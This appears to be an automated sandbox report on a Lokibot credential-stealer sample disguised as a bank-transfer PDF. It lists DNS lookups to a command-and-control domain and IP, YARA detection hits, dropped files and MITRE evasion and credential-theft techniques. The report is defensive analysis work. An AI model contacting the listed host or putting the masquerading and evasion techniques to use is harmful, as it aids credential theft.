Nov 3, 2022 12:31:27.427875996 CET	65044	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:27.445188999 CET	53	65044	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:29.125849009 CET	60032	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:29.145350933 CET	53	60032	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:30.955920935 CET	49232	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:30.976178885 CET	53	49232	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:32.930668116 CET	56123	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:32.949887991 CET	53	56123	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:35.521024942 CET	59752	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:35.540065050 CET	53	59752	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:37.538077116 CET	52865	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:37.555300951 CET	53	52865	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:39.862227917 CET	57322	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:39.879426956 CET	53	57322	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:41.802947998 CET	62958	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:41.821785927 CET	53	62958	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:43.694916964 CET	64404	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:43.714163065 CET	53	64404	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:45.492507935 CET	62848	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:45.510040045 CET	53	62848	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:47.481296062 CET	55956	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:47.499958038 CET	53	55956	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:30:06.615612984 CET	192.168.2.6	8.8.8.8	0x9698	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:11.893251896 CET	192.168.2.6	8.8.8.8	0x836	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:13.938466072 CET	192.168.2.6	8.8.8.8	0x6c7f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:15.990658998 CET	192.168.2.6	8.8.8.8	0x898b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:17.960731983 CET	192.168.2.6	8.8.8.8	0xfd9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:20.174104929 CET	192.168.2.6	8.8.8.8	0xb2c5	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:22.044584990 CET	192.168.2.6	8.8.8.8	0x3df	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:25.312644958 CET	192.168.2.6	8.8.8.8	0x1b5b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:27.345777988 CET	192.168.2.6	8.8.8.8	0x744c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:30.240421057 CET	192.168.2.6	8.8.8.8	0x679b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:32.906943083 CET	192.168.2.6	8.8.8.8	0x93fc	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:34.919732094 CET	192.168.2.6	8.8.8.8	0xf5b2	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:36.914690018 CET	192.168.2.6	8.8.8.8	0x4e0b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:41.510499001 CET	192.168.2.6	8.8.8.8	0x72f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:45.704906940 CET	192.168.2.6	8.8.8.8	0x2cbb	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:47.939956903 CET	192.168.2.6	8.8.8.8	0x5480	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:50.734925985 CET	192.168.2.6	8.8.8.8	0xeac7	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:53.275834084 CET	192.168.2.6	8.8.8.8	0xa703	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:54.819243908 CET	192.168.2.6	8.8.8.8	0xb2a0	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:57.832797050 CET	192.168.2.6	8.8.8.8	0x101a	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:59.560048103 CET	192.168.2.6	8.8.8.8	0x26c2	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:01.170101881 CET	192.168.2.6	8.8.8.8	0x2de9	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:03.812359095 CET	192.168.2.6	8.8.8.8	0x997d	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:05.602891922 CET	192.168.2.6	8.8.8.8	0xdc66	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:07.541344881 CET	192.168.2.6	8.8.8.8	0x2825	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:09.419343948 CET	192.168.2.6	8.8.8.8	0xa44c	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:11.161881924 CET	192.168.2.6	8.8.8.8	0xbf26	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:22.519120932 CET	192.168.2.6	8.8.8.8	0x8b48	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:25.278309107 CET	192.168.2.6	8.8.8.8	0x6a31	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:27.427875996 CET	192.168.2.6	8.8.8.8	0x81d8	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:29.125849009 CET	192.168.2.6	8.8.8.8	0x5fd	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:30.955920935 CET	192.168.2.6	8.8.8.8	0x984b	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:32.930668116 CET	192.168.2.6	8.8.8.8	0x5c96	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:35.521024942 CET	192.168.2.6	8.8.8.8	0x9f71	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:37.538077116 CET	192.168.2.6	8.8.8.8	0x396f	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:39.862227917 CET	192.168.2.6	8.8.8.8	0xc65	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:41.802947998 CET	192.168.2.6	8.8.8.8	0xe860	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:43.694916964 CET	192.168.2.6	8.8.8.8	0x4f0d	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:45.492507935 CET	192.168.2.6	8.8.8.8	0x845a	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:47.481296062 CET	192.168.2.6	8.8.8.8	0xe70	Standard query (0)	sempersim.su	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:30:06.635174990 CET	8.8.8.8	192.168.2.6	0x9698	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:11.910538912 CET	8.8.8.8	192.168.2.6	0x836	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:13.958684921 CET	8.8.8.8	192.168.2.6	0x6c7f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:16.008389950 CET	8.8.8.8	192.168.2.6	0x898b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:18.222553015 CET	8.8.8.8	192.168.2.6	0xfd9	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:20.193391085 CET	8.8.8.8	192.168.2.6	0xb2c5	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:22.064102888 CET	8.8.8.8	192.168.2.6	0x3df	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:25.332699060 CET	8.8.8.8	192.168.2.6	0x1b5b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:27.365106106 CET	8.8.8.8	192.168.2.6	0x744c	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:31.064527988 CET	8.8.8.8	192.168.2.6	0x679b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:32.924936056 CET	8.8.8.8	192.168.2.6	0x93fc	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:34.938977957 CET	8.8.8.8	192.168.2.6	0xf5b2	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:36.935085058 CET	8.8.8.8	192.168.2.6	0x4e0b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:41.802865028 CET	8.8.8.8	192.168.2.6	0x72f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:45.724493027 CET	8.8.8.8	192.168.2.6	0x2cbb	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:47.958667994 CET	8.8.8.8	192.168.2.6	0x5480	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:50.754672050 CET	8.8.8.8	192.168.2.6	0xeac7	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:53.293008089 CET	8.8.8.8	192.168.2.6	0xa703	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:54.838155985 CET	8.8.8.8	192.168.2.6	0xb2a0	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:57.850481033 CET	8.8.8.8	192.168.2.6	0x101a	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:30:59.579384089 CET	8.8.8.8	192.168.2.6	0x26c2	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:01.189847946 CET	8.8.8.8	192.168.2.6	0x2de9	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:03.831717968 CET	8.8.8.8	192.168.2.6	0x997d	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:05.622453928 CET	8.8.8.8	192.168.2.6	0xdc66	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:07.558957100 CET	8.8.8.8	192.168.2.6	0x2825	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:09.438843966 CET	8.8.8.8	192.168.2.6	0xa44c	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:11.179299116 CET	8.8.8.8	192.168.2.6	0xbf26	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:22.538552046 CET	8.8.8.8	192.168.2.6	0x8b48	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:25.295921087 CET	8.8.8.8	192.168.2.6	0x6a31	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:27.445188999 CET	8.8.8.8	192.168.2.6	0x81d8	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:29.145350933 CET	8.8.8.8	192.168.2.6	0x5fd	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:30.976178885 CET	8.8.8.8	192.168.2.6	0x984b	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:32.949887991 CET	8.8.8.8	192.168.2.6	0x5c96	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:35.540065050 CET	8.8.8.8	192.168.2.6	0x9f71	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:37.555300951 CET	8.8.8.8	192.168.2.6	0x396f	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:39.879426956 CET	8.8.8.8	192.168.2.6	0xc65	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:41.821785927 CET	8.8.8.8	192.168.2.6	0xe860	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:43.714163065 CET	8.8.8.8	192.168.2.6	0x4f0d	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:45.510040045 CET	8.8.8.8	192.168.2.6	0x845a	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:31:47.499958038 CET	8.8.8.8	192.168.2.6	0xe70	No error (0)	sempersim.su	91.142.77.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sempersim.su

Target ID:	0
Start time:	12:29:47
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Imagebase:	0xf40000
File size:	811008 bytes
MD5 hash:	355EFB2E1F7DD361F8E7CDA449A45EAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: transferencia bancaria.pdf.exePID: 5228, Parent PID: 1100

General

Target ID:	1
Start time:	12:29:59
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Imagebase:	0x5f0000
File size:	811008 bytes
MD5 hash:	355EFB2E1F7DD361F8E7CDA449A45EAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report transferencia bancaria.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
transferencia bancaria.pdf.exe